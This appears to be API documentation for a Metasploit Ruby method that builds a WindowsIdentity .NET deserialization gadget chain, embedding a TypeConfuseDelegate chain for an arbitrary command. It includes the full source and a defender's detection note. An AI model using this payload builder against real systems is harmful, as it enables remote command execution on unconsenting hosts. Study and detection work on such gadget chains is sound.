Class: Msf::Util::DotNetDeserialization::GadgetChains::WindowsIdentity

Inherits:
Types::SerializedStream show all
Defined in:
lib/msf/util/dot_net_deserialization/gadget_chains/windows_identity.rb

Class Method Summary collapse

Methods inherited from Types::SerializedStream

from_values, #get_object, #set_object

Class Method Details

.generate(cmd) ⇒ Object

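WindowsIdentity gadget chain: embeds the base64-encoded TypeConfuseDelegate chain for `cmd` as the System.Security.ClaimsIdentity.actor string member of a serialized System.Security.Principal.WindowsIdentity object.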

Credits:
  Finders: Levi Broderick
  Contributors: Alvaro Munoz, Soroush Dalili

# File 'lib/msf/util/dot_net_deserialization/gadget_chains/windows_identity.rb', line 13

# Builds the serialized stream for the WindowsIdentity gadget chain.
#
# The stream holds three records, in this order: a serialization header, one
# System.Security.Principal.WindowsIdentity class record, and a message-end
# marker. The class record declares a single String member,
# System.Security.ClaimsIdentity.actor, whose value is the base64 encoding of
# the binary form of the TypeConfuseDelegate chain generated for +cmd+.
#
# NOTE(review): the record names match the .NET binary serialization format
# (MS-NRBF). For defenders, a stream from an untrusted source that names
# WindowsIdentity together with a ClaimsIdentity.actor string member is worth
# flagging; the underlying fix is to not feed untrusted data to that
# deserializer at all.
#
# @param cmd passed unchanged to GadgetChains::TypeConfuseDelegate.generate
# @return [Object] whatever from_values returns for the three records
def self.generate(cmd)
  nested_chain = GadgetChains::TypeConfuseDelegate.generate(cmd)

  header_record = Types::RecordValues::SerializationHeaderRecord.new(root_id: 1, header_id: -1)

  # Describe the outer object: one class, one member, typed as a string.
  identity_class = Types::General::ClassInfo.new(
    obj_id: 1,
    name: 'System.Security.Principal.WindowsIdentity',
    member_names: ['System.Security.ClaimsIdentity.actor']
  )
  member_types = Types::General::MemberTypeInfo.new(binary_type_enums: [:String])

  # The nested chain travels as base64 text inside the actor member.
  actor_value = Types::RecordValues::BinaryObjectString.new(
    obj_id: 2,
    string: Rex::Text.encode_base64(nested_chain.to_binary_s)
  )

  identity_record = Types::RecordValues::SystemClassWithMembersAndTypes.from_member_values(
    class_info: identity_class,
    member_type_info: member_types,
    member_values: [Types::Record.from_value(actor_value)]
  )

  from_values([header_record, identity_record, Types::RecordValues::MessageEnd.new])
end